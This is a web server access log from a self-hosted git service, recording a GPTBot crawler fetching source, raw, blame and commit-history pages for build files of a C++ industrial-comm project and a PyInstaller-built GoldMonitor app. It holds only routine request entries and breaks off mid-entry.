"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14100] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12993] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10217] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11897] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11009] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 4184405] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -[17/Feb/2026:16:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17752] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:16:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 159003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:16:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17051] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:16:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:16:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17963] [Gzip 11.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:16:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:16:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10225] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11084] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:02:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10006] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:02:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14154] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10229] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:02:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70927] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 69020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:16:02:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 71910] [Gzip 17.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:16:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 159003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:16:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 73286] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:16:02:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 38620] [Gzip 14.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:16:02:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 37048] [Gzip 14.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:16:02:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11026] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build" -[17/Feb/2026:16:02:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 72074] [Gzip 17.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:16:02:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 72025] [Gzip 17.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:16:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 70834] [Gzip 17.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:16:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 160654] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:16:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:16:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:16:02:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 99914] [Gzip 29.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:16:02:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 37053] [Gzip 14.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:16:02:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:16:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:16:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10175] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:16:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:16:02:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:16:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 49770] [Gzip 27.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:16:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 9882] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -[17/Feb/2026:16:02:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 100852] [Gzip 29.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:16:02:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 99738] [Gzip 29.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:16:02:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 